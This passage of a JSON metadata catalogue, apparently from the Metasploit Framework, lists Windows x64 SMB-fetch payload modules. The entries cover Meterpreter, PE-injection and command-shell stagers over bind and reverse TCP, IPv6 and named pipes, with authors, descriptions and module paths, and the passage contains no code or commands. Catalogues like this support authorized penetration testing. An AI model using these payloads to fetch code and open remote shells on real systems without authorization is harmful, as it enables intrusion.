"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/pingback_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/pingback_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_bind_tcp": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_reverse_tcp": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_reverse_tcp_ssl",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
